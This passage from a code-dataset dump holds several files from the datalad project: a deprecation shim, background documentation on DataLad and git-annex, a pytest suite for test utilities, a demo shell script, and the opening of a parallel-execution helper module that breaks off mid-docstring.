"length_bytes": 623, "license_type": "permissive", "max_line_length": 87, "num_lines": 17, "path": "/datalad/cmdline/__init__.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"\n\"\"\"\n\nimport warnings\nwarnings.warn(\n \"All of datalad.cmdline is deprecated/discontinued as of datalad 0.16. \"\n \"A new CLI implementation is available at datalad.cli. \"\n \"Please adjust any imports.\",\n DeprecationWarning)\n" }, { "alpha_fraction": 0.8062942028045654, "alphanum_fraction": 0.8071356415748596, "avg_line_length": 55.590476989746094, "blob_id": "935c258b422d2fd4cff89917d9d03c3c51f59731", "content_id": "b03b772d104ced3659dbba468486be53ea59319a", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 5942, "license_type": "permissive", "max_line_length": 79, "num_lines": 105, "path": "/docs/source/background.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "Background and motivation\n*************************\n\nVision\n======\n\nData is at the core of science, and unobstructed access promotes scientific\ndiscovery through collaboration between data producers and consumers. 
The last\nyears have seen dramatic improvements in availability of data resources for\ncollaborative research, and new data providers are becoming available all the\ntime.\n\nHowever, despite the increased availability of data, their accessibility is far\nfrom being optimal. Potential consumers of these public datasets have to\nmanually browse various disconnected warehouses with heterogeneous interfaces.\nOnce obtained, data is disconnected from its origin and data versioning is\noften ad-hoc or completely absent. If data consumers can be reliably informed\nabout data updates at all, review of changes is difficult, and re-deployment is\ntedious and error-prone. This leads to wasteful friction caused by outdated or\nfaulty data.\n\nThe vision for this project is to transform the state of data-sharing and\ncollaborative work by providing uniform access to available datasets --\nindependent of hosting solutions or authentication schemes -- with reliable\nversioning and versatile deployment logistics. This is achieved by means of a\n:term:`dataset` handle, a lightweight representation of a dataset\nthat is capable of tracking the identity and location of a dataset's content as\nwell as carry meta-data. Together with associated software tools, scientists\nare able to obtain, use, extend, and share datasets (or parts thereof) in a\nway that is traceable back to the original data producer and is therefore\ncapable of establishing a strong connection between data consumers and the\nevolution of a dataset by future extension or error correction.\n\nMoreover, DataLad aims to provide all tools necessary to create and publish\n*data distributions* |---| an analog to software distributions or app-stores\nthat provide logistics middleware for software deployment. Scientific\ncommunities can use these tools to gather, curate, and make publicly available\nspecialized collections of datasets for specific research topics or data\nmodalities. All of this is possible by leveraging existing data sharing\nplatforms and institutional resources without the need for funding extra\ninfrastructure of duplicate storage. Specifically, this project aims to provide\na comprehensive, extensible data distribution for neuroscientific datasets that\nis kept up-to-date by an automated service.\n\n\nTechnological foundation: git-annex\n===================================\n\nThe outlined task is not unique to the problem of data-sharing in science.\nLogistical challenges such as delivering data, long-term storage and archiving,\nidentity tracking, and synchronization between multiple sites are rather\ncommon. Consequently, solutions have been developed in other contexts that can\nbe adapted to benefit scientific data-sharing.\n\nThe closest match is the software tool git-annex_. It combines the features of\nthe distributed version control system (dVCS) Git_ |---| a technology that has\nrevolutionized collaborative software development -- with versatile data access\nand delivery logistics. Git-annex was originally developed to address use cases\nsuch as managing a collection of family pictures at home. With git-annex, any\nfamily member can obtain an individual copy of such a picture library |---| the\n:term:`annex`. 
The annex in this example is essentially an image repository\nthat presents individual pictures to users as files in a single directory\nstructure, even though the actual image file contents may be distributed across\nmultiple locations, including a home-server, cloud-storage, or even off-line\nmedia such as external hard-drives.\n\nGit-annex provides functionality to obtain file contents upon request and can\nprompt users to make particular storage devices available when needed (e.g. a\nbackup hard-drive kept in a fire-proof compartment). Git-annex can also remove\nfiles from a local copy of that image repository, for example to free up space\non a laptop, while ensuring a configurable level of data redundancy across all\nknown storage locations. Lastly, git-annex is able to synchronize the content\nof multiple distributed copies of this image repository, for example in order\nto incorporate images added with the git-annex on the laptop of another family\nmember. It is important to note that git-annex is agnostic of the actual file\ntypes and is not limited to images.\n\nWe believe that the approach to data logistics taken by git-annex and the\nfunctionality it is currently providing are an ideal middleware for scientific\ndata-sharing. Its data repository model :term:`annex` readily provides the\nmajority of principal features needed for a dataset handle such as history\nrecording, identity tracking, and item-based resource locators. Consequently,\ninstead of a from-scratch development, required features, such as dedicated\nsupport for existing data-sharing portals and dataset meta-information, can be\nadded to a working solution that is already in production for several years.\nAs a result, DataLad focuses on the expansion of git-annex's functionality and\nthe development of tools that build atop Git and git-annex and enable the\ncreation, management, use, and publication of dataset handles and collections\nthereof.\n\nObjective\n=========\n\nBuilding atop git-annex, DataLad aims to provide a single, uniform interface to\naccess data from various data-sharing initiatives and data providers, and\nfunctionality to create, deliver, update, and share datasets for individuals\nand portal maintainers. As a command-line tool, it provides an abstraction\nlayer for the underlying Git-based middleware implementing the actual data\nlogistics, and serves as a foundation for other future user front-ends, such\nas a web-interface.\n\n.. |---| unicode:: U+02014 .. em dash\n\n.. _Git: https://git-scm.com\n.. 
_git-annex: http://git-annex.branchable.com\n" }, { "alpha_fraction": 0.6187578439712524, "alphanum_fraction": 0.6278162598609924, "avg_line_length": 30.154848098754883, "blob_id": "ddab966dc6868b185a0a9af00f1c30c8dd0b6b15", "content_id": "af234f7b8f2e8b03dbbf41cd42dc2bff4ddcc8ca", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21534, "license_type": "permissive", "max_line_length": 102, "num_lines": 691, "path": "/datalad/tests/test_tests_utils_pytest.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil; coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nimport base64\nimport logging\nimport os\nimport platform\nimport random\nimport sys\n\ntry:\n # optional direct dependency we might want to kick out\n import bs4\nexcept ImportError: # pragma: no cover\n bs4 = None\n\nfrom glob import glob\nfrom os.path import (\n basename,\n exists,\n)\nfrom os.path import join as opj\nfrom unittest.mock import patch\nfrom urllib.parse import quote as url_quote\nfrom urllib.request import (\n Request,\n urlopen,\n)\n\nimport pytest\nfrom _pytest.outcomes import (\n Failed,\n Skipped,\n)\n\nfrom datalad import cfg as dl_cfg\nfrom datalad.support import path as op\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.tests.utils_pytest import (\n OBSCURE_FILENAMES,\n OBSCURE_PREFIX,\n assert_cwd_unchanged,\n assert_dict_equal,\n assert_false,\n assert_in,\n assert_not_in,\n assert_raises,\n assert_re_in,\n assert_str_equal,\n assert_true,\n eq_,\n get_most_obscure_supported_name,\n ignore_nose_capturing_stdout,\n known_failure_githubci_win,\n known_failure_windows,\n local_testrepo_flavors,\n nok_startswith,\n ok_,\n ok_broken_symlink,\n ok_file_has_content,\n ok_file_under_git,\n ok_generator,\n ok_good_symlink,\n ok_startswith,\n ok_symlink,\n on_windows,\n patch_config,\n probe_known_failure,\n rmtemp,\n run_under_dir,\n serve_path_via_http,\n skip_if,\n skip_if_no_module,\n skip_if_no_network,\n skip_if_on_windows,\n skip_ssh,\n skip_wo_symlink_capability,\n swallow_logs,\n with_tempfile,\n with_testsui,\n with_tree,\n without_http_proxy,\n)\nfrom datalad.utils import (\n Path,\n chpwd,\n getpwd,\n)\n\n#\n# Test with_tempfile, especially nested invocations\n#\n\n@with_tempfile\ndef _with_tempfile_decorated_dummy(path):\n return path\n\n\ndef test_with_tempfile_dir_via_env_variable():\n target = os.path.join(os.path.expanduser(\"~\"), \"dataladtesttmpdir\")\n assert_false(os.path.exists(target), \"directory %s already exists.\" % target)\n\n with patch_config({'datalad.tests.temp.dir': target}):\n filename = _with_tempfile_decorated_dummy()\n ok_startswith(filename, target)\n\n@with_tempfile\n@with_tempfile\ndef test_nested_with_tempfile_basic(f1=None, f2=None):\n ok_(f1 != f2)\n ok_(not os.path.exists(f1))\n ok_(not os.path.exists(f2))\n\n\n# And the most obscure case to test. 
Generator for the test is\n# used as well to verify that every one of those functions adds new argument\n# to the end of incoming arguments.\n@with_tempfile(prefix=\"TEST\", suffix='big')\n@with_tree((('f1.txt', 'load'),))\n@with_tempfile(suffix='.cfg')\n@with_tempfile(suffix='.cfg.old')\ndef check_nested_with_tempfile_parametrized_surrounded(\n param, f0=None, tree=None, f1=None, f2=None, repo=None):\n eq_(param, \"param1\")\n ok_(f0.endswith('big'), msg=\"got %s\" % f0)\n ok_(os.path.basename(f0).startswith('TEST'), msg=\"got %s\" % f0)\n ok_(os.path.exists(os.path.join(tree, 'f1.txt')))\n ok_(f1 != f2)\n ok_(f1.endswith('.cfg'), msg=\"got %s\" % f1)\n ok_(f2.endswith('.cfg.old'), msg=\"got %s\" % f2)\n\n\n\ndef test_nested_with_tempfile_parametrized_surrounded():\n check_nested_with_tempfile_parametrized_surrounded(\"param1\")\n\n\n@with_tempfile(content=\"testtest\")\ndef test_with_tempfile_content(f=None):\n ok_file_has_content(f, \"testtest\")\n ok_file_has_content(f, \"test*\", re_=True)\n\n\ndef test_with_tempfile_content_raises_on_mkdir():\n\n @with_tempfile(content=\"test\", mkdir=True)\n def t(): # pragma: no cover\n raise AssertionError(\"must not be run\")\n\n with assert_raises(ValueError):\n # after this commit, it will check when invoking, not when decorating\n t()\n\n\ndef test_get_resolved_values():\n from datalad.tests.utils_pytest import _get_resolved_flavors\n flavors = ['networkish', 'local']\n eq_(([] if dl_cfg.get('datalad.tests.nonetwork') else ['networkish'])\n + ['local'],\n _get_resolved_flavors(flavors))\n\n with patch_config({'datalad.tests.nonetwork': '1'}):\n eq_(_get_resolved_flavors(flavors), ['local'])\n\ndef test_with_tempfile_mkdir():\n dnames = [] # just to store the name within the decorated function\n\n @with_tempfile(mkdir=True)\n def check_mkdir(d1):\n ok_(os.path.exists(d1))\n ok_(os.path.isdir(d1))\n dnames.append(d1)\n eq_(glob(os.path.join(d1, '*')), [])\n # Create a file to assure we can remove later the temporary load\n with open(os.path.join(d1, \"test.dat\"), \"w\") as f:\n f.write(\"TEST LOAD\")\n\n check_mkdir()\n if not dl_cfg.get('datalad.tests.temp.keep'):\n ok_(not os.path.exists(dnames[0])) # got removed\n\n\n@with_tempfile()\ndef test_with_tempfile_default_prefix(d1=None):\n d = basename(d1)\n short = 'datalad_temp_'\n full = short + \\\n 'test_with_tempfile_default_prefix'\n if on_windows:\n ok_startswith(d, short)\n nok_startswith(d, full)\n else:\n ok_startswith(d, full)\n\n\n@with_tempfile(prefix=\"nodatalad_\")\ndef test_with_tempfile_specified_prefix(d1=None):\n ok_startswith(basename(d1), 'nodatalad_')\n ok_('test_with_tempfile_specified_prefix' not in d1)\n\n\ndef test_get_most_obscure_supported_name():\n n = get_most_obscure_supported_name()\n ok_startswith(n, OBSCURE_PREFIX)\n ok_(len(OBSCURE_FILENAMES) > 1)\n # from more complex to simpler ones\n ok_(len(OBSCURE_FILENAMES[0]) > len(OBSCURE_FILENAMES[-1]))\n print(repr(n))\n\n\ndef test_keeptemp_via_env_variable():\n\n if dl_cfg.get('datalad.tests.temp.keep'): # pragma: no cover\n pytest.skip(\"We have env variable set to preserve tempfiles\")\n\n files = []\n\n @with_tempfile()\n def check(f):\n open(f, 'w').write(\"LOAD\")\n files.append(f)\n\n with patch.dict('os.environ', {}):\n check()\n\n with patch.dict('os.environ', {'DATALAD_TESTS_TEMP_KEEP': '1'}):\n check()\n\n eq_(len(files), 2)\n ok_(not exists(files[0]), msg=\"File %s still exists\" % files[0])\n ok_( exists(files[1]), msg=\"File %s not exists\" % files[1])\n\n 
rmtemp(files[-1])\n\n\n@skip_wo_symlink_capability\n@with_tempfile\ndef test_ok_symlink_helpers(tmpfile=None):\n\n assert_raises(AssertionError, ok_symlink, tmpfile)\n assert_raises(AssertionError, ok_good_symlink, tmpfile)\n assert_raises(AssertionError, ok_broken_symlink, tmpfile)\n\n tmpfile_symlink = tmpfile + '_symlink'\n Path(tmpfile_symlink).symlink_to(Path(tmpfile))\n\n # broken symlink\n ok_symlink(tmpfile_symlink)\n ok_broken_symlink(tmpfile_symlink)\n assert_raises(AssertionError, ok_good_symlink, tmpfile_symlink)\n\n with open(tmpfile, 'w') as tf:\n tf.write('test text')\n \n # tmpfile is still not a symlink here\n assert_raises(AssertionError, ok_symlink, tmpfile)\n assert_raises(AssertionError, ok_good_symlink, tmpfile)\n assert_raises(AssertionError, ok_broken_symlink, tmpfile)\n\n ok_symlink(tmpfile_symlink)\n ok_good_symlink(tmpfile_symlink)\n assert_raises(AssertionError, ok_broken_symlink, tmpfile_symlink)\n\n\ndef test_ok_startswith():\n ok_startswith('abc', 'abc')\n ok_startswith('abc', 'a')\n ok_startswith('abc', '')\n ok_startswith(' abc', ' ')\n ok_startswith('abc\\r\\n', 'a') # no effect from \\r\\n etc\n assert_raises(AssertionError, ok_startswith, 'abc', 'b')\n assert_raises(AssertionError, ok_startswith, 'abc', 'abcd')\n\n\ndef test_nok_startswith():\n nok_startswith('abc', 'bc')\n nok_startswith('abc', 'c')\n assert_raises(AssertionError, nok_startswith, 'abc', 'a')\n assert_raises(AssertionError, nok_startswith, 'abc', 'abc')\n\ndef test_ok_generator():\n def func(a, b=1):\n return a+b\n def gen(a, b=1): # pragma: no cover\n yield a+b\n # not sure how to determine if xrange is a generator\n assert_raises(AssertionError, ok_generator, range(2))\n assert_raises(AssertionError, ok_generator, gen)\n ok_generator(gen(1))\n assert_raises(AssertionError, ok_generator, func)\n assert_raises(AssertionError, ok_generator, func(1))\n\n\[email protected](\"func\", [os.chdir, chpwd])\ndef test_assert_Xwd_unchanged(func):\n orig_cwd = os.getcwd()\n orig_pwd = getpwd()\n\n @assert_cwd_unchanged\n def do_chdir():\n func(os.pardir)\n\n with assert_raises(AssertionError) as cm:\n do_chdir()\n\n eq_(orig_cwd, os.getcwd(),\n \"assert_cwd_unchanged didn't return us back to cwd %s\" % orig_cwd)\n eq_(orig_pwd, getpwd(),\n \"assert_cwd_unchanged didn't return us back to pwd %s\" % orig_pwd)\n\[email protected](\"func\", [os.chdir, chpwd])\ndef test_assert_Xwd_unchanged_ok_chdir(func):\n # Test that we are not masking out other \"more important\" exceptions\n\n orig_cwd = os.getcwd()\n orig_pwd = getpwd()\n\n @assert_cwd_unchanged(ok_to_chdir=True)\n def do_chdir_value_error():\n func(os.pardir)\n return \"a value\"\n\n with swallow_logs() as cml:\n eq_(do_chdir_value_error(), \"a value\")\n eq_(orig_cwd, os.getcwd(),\n \"assert_cwd_unchanged didn't return us back to cwd %s\" % orig_cwd)\n eq_(orig_pwd, getpwd(),\n \"assert_cwd_unchanged didn't return us back to cwd %s\" % orig_pwd)\n assert_not_in(\"Mitigating and changing back\", cml.out)\n\n\ndef test_assert_cwd_unchanged_not_masking_exceptions():\n # Test that we are not masking out other \"more important\" exceptions\n\n orig_cwd = os.getcwd()\n\n @assert_cwd_unchanged\n def do_chdir_value_error():\n os.chdir(os.pardir)\n raise ValueError(\"error exception\")\n\n with swallow_logs(new_level=logging.WARN) as cml:\n with assert_raises(ValueError) as cm:\n do_chdir_value_error()\n # retrospect exception\n eq_(orig_cwd, os.getcwd(),\n \"assert_cwd_unchanged didn't return us back to %s\" % orig_cwd)\n assert_in(\"Mitigating and 
changing back\", cml.out)\n\n # and again but allowing to chdir\n @assert_cwd_unchanged(ok_to_chdir=True)\n def do_chdir_value_error():\n os.chdir(os.pardir)\n raise ValueError(\"error exception\")\n\n with swallow_logs(new_level=logging.WARN) as cml:\n assert_raises(ValueError, do_chdir_value_error)\n eq_(orig_cwd, os.getcwd(),\n \"assert_cwd_unchanged didn't return us back to %s\" % orig_cwd)\n assert_not_in(\"Mitigating and changing back\", cml.out)\n\n\n@with_tempfile(mkdir=True)\ndef _test_serve_path_via_http(test_fpath, use_ssl, auth, tmp_dir): # pragma: no cover\n tmp_dir = Path(tmp_dir)\n test_fpath = Path(test_fpath)\n # First verify that filesystem layer can encode this filename\n # verify first that we could encode file name in this environment\n try:\n filesysencoding = sys.getfilesystemencoding()\n test_fpath_encoded = str(test_fpath.as_posix()).encode(filesysencoding)\n except UnicodeEncodeError: # pragma: no cover\n pytest.skip(\"Environment doesn't support unicode filenames\")\n if test_fpath_encoded.decode(filesysencoding) != test_fpath.as_posix(): # pragma: no cover\n pytest.skip(\"Can't convert back/forth using %s encoding\"\n % filesysencoding)\n\n test_fpath_full = tmp_dir / test_fpath\n test_fpath_full.parent.mkdir(parents=True, exist_ok=True)\n test_fpath_full.write_text(\n f'some txt and a randint {random.randint(1, 10)}')\n\n @serve_path_via_http(tmp_dir, use_ssl=use_ssl, auth=auth)\n def test_path_and_url(path, url):\n def _urlopen(url, auth=None):\n req = Request(url)\n if auth:\n req.add_header(\n \"Authorization\",\n b\"Basic \" + base64.standard_b64encode(\n '{0}:{1}'.format(*auth).encode('utf-8')))\n return urlopen(req)\n\n # @serve_ should remove http_proxy from the os.environ if was present\n if not on_windows:\n assert_false('http_proxy' in os.environ)\n # get the \"dir-view\"\n dirurl = url + test_fpath.parent.as_posix()\n u = _urlopen(dirurl, auth)\n assert_true(u.getcode() == 200)\n html = u.read()\n # get the actual content\n file_html = _urlopen(\n url + url_quote(test_fpath.as_posix()), auth).read().decode()\n # verify we got the right one\n eq_(file_html, test_fpath_full.read_text())\n\n if bs4 is None:\n return\n\n # MIH is not sure what this part below is supposed to do\n # possibly some kind of internal consistency test\n soup = bs4.BeautifulSoup(html, \"html.parser\")\n href_links = [txt.get('href') for txt in soup.find_all('a')]\n assert_true(len(href_links) == 1)\n parsed_url = f\"{dirurl}/{href_links[0]}\"\n u = _urlopen(parsed_url, auth)\n html = u.read().decode()\n eq_(html, file_html)\n\n test_path_and_url()\n\n\[email protected](\"test_fpath\", [\n 'test1.txt',\n Path('test_dir', 'test2.txt'),\n Path('test_dir', 'd2', 'd3', 'test3.txt'),\n 'file with space test4',\n u'Джэйсон',\n get_most_obscure_supported_name(),\n])\[email protected](\"use_ssl,auth\", [\n (False, None),\n (True, None),\n (False, ('ernie', 'bert')),\n])\ndef test_serve_path_via_http(test_fpath, use_ssl, auth):\n _test_serve_path_via_http(test_fpath, use_ssl, auth)\n\n\ndef test_serve_path_via_http_local_proxy():\n # just with the last one check that we did remove proxy setting\n with patch.dict('os.environ', {'http_proxy': 'http://127.0.0.1:9/'}):\n _test_serve_path_via_http(get_most_obscure_supported_name(), False, None)\n\n\n@known_failure_githubci_win\ndef test_without_http_proxy():\n\n @without_http_proxy\n def check(a, kw=False):\n assert_false('http_proxy' in os.environ)\n assert_false('https_proxy' in os.environ)\n assert_in(kw, [False, 'custom'])\n\n check(1)\n\n 
with patch.dict('os.environ', {'http_proxy': 'http://127.0.0.1:9/'}):\n check(1)\n check(1, \"custom\")\n with assert_raises(AssertionError):\n check(1, \"wrong\")\n\n with patch.dict('os.environ', {'https_proxy': 'http://127.0.0.1:9/'}):\n check(1)\n with patch.dict('os.environ', {'http_proxy': 'http://127.0.0.1:9/',\n 'https_proxy': 'http://127.0.0.1:9/'}):\n check(1)\n\n\ndef test_assert_re_in():\n assert_re_in(\".*\", \"\")\n assert_re_in(\".*\", [\"any\"])\n\n # should do match not search\n assert_re_in(\"ab\", \"abc\")\n assert_raises(AssertionError, assert_re_in, \"ab\", \"cab\")\n assert_raises(AssertionError, assert_re_in, \"ab$\", \"abc\")\n\n # Sufficient to have one entry matching\n assert_re_in(\"ab\", [\"\", \"abc\", \"laskdjf\"])\n assert_raises(AssertionError, assert_re_in, \"ab$\", [\"ddd\", \"\"])\n\n # Tuples should be ok too\n assert_re_in(\"ab\", (\"\", \"abc\", \"laskdjf\"))\n assert_raises(AssertionError, assert_re_in, \"ab$\", (\"ddd\", \"\"))\n\n # shouldn't \"match\" the empty list\n assert_raises(AssertionError, assert_re_in, \"\", [])\n\n\ndef test_skip_if_no_network():\n cleaned_env = os.environ.copy()\n cleaned_env.pop('DATALAD_TESTS_NONETWORK', None)\n # we need to run under cleaned env to make sure we actually test in both conditions\n with patch('os.environ', cleaned_env):\n @skip_if_no_network\n def somefunc(a1):\n return a1\n #ok_(hasattr(somefunc, \"network\"))\n with patch_config({'datalad.tests.nonetwork': '1'}):\n assert_raises(Skipped, somefunc, 1)\n with patch.dict('os.environ', {}):\n eq_(somefunc(1), 1)\n # and now if used as a function, not a decorator\n with patch_config({'datalad.tests.nonetwork': '1'}):\n assert_raises(Skipped, skip_if_no_network)\n with patch.dict('os.environ', {}):\n eq_(skip_if_no_network(), None)\n\n\ndef test_skip_if_no_module():\n\n def testish():\n skip_if_no_module(\"nonexistingforsuremodule\")\n raise ValueError\n assert_raises(Skipped, testish)\n\n def testish2():\n skip_if_no_module(\"datalad\")\n return \"magic\"\n eq_(testish2(), \"magic\")\n\n\ndef test_skip_if():\n\n with assert_raises(Skipped):\n @skip_if(True)\n def f(): # pragma: no cover\n raise AssertionError(\"must have not been ran\")\n f()\n\n @skip_if(False)\n def f():\n return \"magical\"\n eq_(f(), 'magical')\n\n\n@assert_cwd_unchanged\n@with_tempfile(mkdir=True)\ndef test_run_under_dir(d=None):\n orig_pwd = getpwd()\n orig_cwd = os.getcwd()\n\n @run_under_dir(d)\n def f(arg, kwarg=None):\n eq_(arg, 1)\n eq_(kwarg, 2)\n eq_(getpwd(), d)\n\n f(1, 2)\n eq_(getpwd(), orig_pwd)\n eq_(os.getcwd(), orig_cwd)\n\n # and if fails\n assert_raises(AssertionError, f, 1, 3)\n eq_(getpwd(), orig_pwd)\n eq_(os.getcwd(), orig_cwd)\n\n\ndef test_assert_dict_equal():\n assert_dict_equal({}, {})\n assert_dict_equal({\"a\": 3}, {\"a\": 3})\n assert_raises(AssertionError, assert_dict_equal, {1: 3}, {1: 4})\n assert_raises(AssertionError, assert_dict_equal, {1: 3}, {2: 4})\n assert_raises(AssertionError, assert_dict_equal, {1: 3}, {2: 4, 1: 3})\n assert_raises(AssertionError, assert_dict_equal, {1: 3}, {2: 4, 1: 'a'})\n try:\n import numpy as np\n except: # pragma: no cover\n pytest.skip(\"need numpy for this tiny one\")\n # one is scalar another one array\n assert_raises(AssertionError, assert_dict_equal, {1: 0}, {1: np.arange(1)})\n assert_raises(AssertionError, assert_dict_equal, {1: 0}, {1: np.arange(3)})\n\n\ndef test_assert_str_equal():\n assert_str_equal(\"a\", \"a\")\n assert_str_equal(\"a\\n\", \"a\\n\")\n assert_str_equal(\"a\\nb\", \"a\\nb\")\n 
assert_raises(AssertionError, assert_str_equal, \"a\", \"a\\n\")\n assert_raises(AssertionError, assert_str_equal, \"a\", \"b\")\n assert_raises(AssertionError, assert_str_equal, \"ab\", \"b\")\n\n\ndef test_testsui():\n # just one for now to test conflicting arguments\n with assert_raises(ValueError):\n @with_testsui(responses='some', interactive=False)\n def some_func(): # pragma: no cover\n pass\n\n from datalad.ui import ui\n\n @with_testsui(responses=['yes', \"maybe so\"])\n def func2(x):\n assert x == 1\n eq_(ui.yesno(\"title\"), True)\n eq_(ui.question(\"title2\"), \"maybe so\")\n assert_raises(AssertionError, ui.question, \"asking more than we know\")\n return x*2\n eq_(func2(1), 2)\n\n @with_testsui(interactive=False)\n def func3(x):\n assert_false(ui.is_interactive)\n return x*3\n eq_(func3(2), 6)\n\n\ndef test_setup():\n # just verify that we monkey patched consts correctly\n from datalad.consts import DATASETS_TOPURL\n eq_(DATASETS_TOPURL, 'https://datasets-tests.datalad.org/')\n from datalad.tests.utils_pytest import get_datasets_topdir\n eq_(get_datasets_topdir(), 'datasets-tests.datalad.org')\n\n\ndef test_skip_ssh():\n with patch_config({'datalad.tests.ssh': False}):\n with assert_raises(Skipped):\n skip_ssh(lambda: False)()\n\n\ndef test_probe_known_failure():\n # should raise assert error if function no longer fails\n with patch_config({'datalad.tests.knownfailures.probe': True}):\n with assert_raises(Failed):\n probe_known_failure(lambda: True)()\n\n with patch_config({'datalad.tests.knownfailures.probe': False}):\n ok_(probe_known_failure(lambda: True))\n\n\ndef test_ignore_nose_capturing_stdout():\n # Just test the logic, not really a situation under overwritten stdout\n def raise_exc():\n raise AttributeError('nose causes a message which includes words '\n 'StringIO and fileno')\n with assert_raises(AttributeError):\n ignore_nose_capturing_stdout(raise_exc)()\n\n\n@skip_wo_symlink_capability\n@with_tree(tree={'ingit': '', 'staged': 'staged', 'notingit': ''})\ndef test_ok_file_under_git_symlinks(path=None):\n # Test that works correctly under symlinked path\n orepo = GitRepo(path)\n orepo.add('ingit')\n orepo.commit('msg')\n orepo.add('staged')\n lpath = path + \"-symlink\" # will also be removed AFAIK by our tempfile handling\n Path(lpath).symlink_to(Path(path))\n ok_symlink(lpath)\n ok_file_under_git(op.join(path, 'ingit'))\n ok_file_under_git(op.join(lpath, 'ingit'))\n ok_file_under_git(op.join(lpath, 'staged'))\n with assert_raises(AssertionError):\n ok_file_under_git(op.join(lpath, 'notingit'))\n with assert_raises(AssertionError):\n ok_file_under_git(op.join(lpath, 'nonexisting'))\n\n\ndef test_assert_raises():\n # rudimentary test of assert_raises shim prompted by suspicion in\n # https://github.com/datalad/datalad/issues/6846#issuecomment-1363878497\n def raise_ValueError():\n raise ValueError(\"exc ValueError\")\n\n def raise_TypeError():\n raise TypeError(\"exc TypeError\")\n\n # Test both forms of use\n with assert_raises(ValueError):\n raise_ValueError()\n assert_raises(ValueError, raise_ValueError)\n\n # can we specify multiple in a tuple?\n with assert_raises((ValueError, TypeError)):\n raise_ValueError()\n with assert_raises((ValueError, TypeError)):\n raise_TypeError()\n\n assert_raises((ValueError, TypeError), raise_TypeError)\n assert_raises((ValueError, TypeError), raise_ValueError)" }, { "alpha_fraction": 0.7448275685310364, "alphanum_fraction": 0.751724123954773, "avg_line_length": 81.85713958740234, "blob_id": 
"db90f43f28c2bb8c4cc8d7f27b28824b62f9e94b", "content_id": "457892a9125b73b405e1ad0a9f3a951149d81516", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 580, "license_type": "permissive", "max_line_length": 151, "num_lines": 7, "path": "/docs/casts/cmdline_basic_usage.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "say \"All of DataLad's functionality is available through a single command: \\`datalad\\`\"\nsay \"Running the datalad command without any arguments, gives a summary of basic options, and a list of available sub-commands.\"\nrun \"datalad\"\nsay \"More comprehensive information is available via the --help long-option (we will truncate the output here)\"\nrun \"datalad --help | head -n10\"\nsay \"Getting information on any of the available sub commands works in the same way -- just pass --help AFTER the sub-command (output again truncated)\"\nrun \"datalad create --help | head -n20\"\n" }, { "alpha_fraction": 0.5576846599578857, "alphanum_fraction": 0.5595929026603699, "avg_line_length": 42.443870544433594, "blob_id": "10355087bdafbebb39889189f097cec2635cbcdd", "content_id": "13004d542129e4a1949540b1d7fd21de2fc97a24", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 25154, "license_type": "permissive", "max_line_length": 119, "num_lines": 579, "path": "/datalad/support/parallel.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Helpers for parallel execution\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport concurrent.futures\nimport inspect\nimport sys\nimport time\nimport uuid\n\nfrom collections import defaultdict\nfrom queue import Queue, Empty\nfrom threading import Thread\n\nfrom . import ansi_colors as colors\nfrom ..log import log_progress\nfrom ..utils import path_is_subpath\nfrom datalad.support.exceptions import CapturedException\n\nimport logging\nlgr = logging.getLogger('datalad.parallel')\n\n\ndef _count_str(count, verb, omg=False):\n if count:\n msg = \"{:d} {}\".format(count, verb)\n if omg:\n msg = colors.color_word(msg, colors.RED)\n return msg\n\n\n#\n# safe_to_consume helpers\n#\n\ndef no_parentds_in_futures(futures, path, skip=tuple()):\n \"\"\"Return True if no path in futures keys is parentds for provided path\n\n Assumes that the future's key is the path.\n\n Parameters\n ----------\n skip: iterable\n Do not consider futures with paths in skip. E.g. it could be top level\n dataset which we know it exists already, and it is ok to start with child\n process before it\n \"\"\"\n # TODO: OPT. 
Could benefit from smarter than linear time if not one at a time?\n # or may be we should only go through active futures (still linear!)?\n return all(not path_is_subpath(path, p) or p in skip for p in futures)\n\n\ndef no_subds_in_futures(futures, path, skip=tuple()):\n \"\"\"Return True if no path in futures keys is a subdataset for provided path\n\n See `no_parentds_in_futures` for more info\n \"\"\"\n return all(not path_is_subpath(p, path) or p in skip for p in futures)\n\n\nclass ProducerConsumer:\n \"\"\"Producer/Consumer implementation to (possibly) parallelize execution.\n\n It is an iterable providing a multi-threaded producer/consumer implementation,\n where there could be multiple consumers for items produced by a producer. Since\n in DataLad majority of time is done in IO interactions with outside git and git-annex\n processes, and since we typically operate across multiple datasets, multi-threading\n across datasets operations already provides a significant performance benefit.\n\n All results from consumers are all yielded as soon as they are produced by consumers.\n Because this implementation is based on threads, `producer` and `consumer` could\n be some \"closures\" within code, thus having lean interface and accessing\n data from shared \"outer 